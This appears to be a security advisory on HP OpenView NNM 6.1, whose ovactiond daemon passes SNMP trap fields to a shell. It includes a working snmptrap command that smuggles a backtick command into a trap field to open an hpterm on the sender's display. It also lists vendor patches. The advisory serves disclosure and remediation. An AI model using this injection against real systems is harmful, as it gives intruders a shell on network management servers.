Vulnerability

    OpenView

Affected

    HP Openview NNM6.1

Description

    Milo van der Zee found following.  HP Openview NNM6.1 and  earlier
    running  on  unix  have  a  problem  with  the suid bin executable
    ovactiond.  It allows for starting of any program by just  sending
    a trap or event to the station running the daemon.

    Actually the executable is  NOT suid bin but  it does run as  user
    bin (probably an internal suid system call or started from the pmd
    that  runs  as  bin  or  ...).   So  when  you do a 'ps -ef | grep
    ovactiond'  you  will  see  that  it  is  running as bin.  Even on
    Solaris.

    In the trapd.conf the following is defined by default (NNM6.1):

        #
        EVENT
        OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
        0208 "Configuration Alarms" Warning
        FORMAT Generic NNM to MgX message. $12
        EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
        $10 1.3.[snip...]
        #

    By sending this trap:

        snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""

    You get an hpterm on your client display running under user bin on
    the  NNM  server.   The  reason  is  that  NNM first completes the
    command under the EXEC and then starts that in a shell.

Solution

    Apply one of these patches:

        HP-UX 11.00     HP-UX 10.20     SOLARIS 2.X     WinNT4.X/2000
        PHSS_23780      PHSS_23779      PSOV_02905      NNM_00698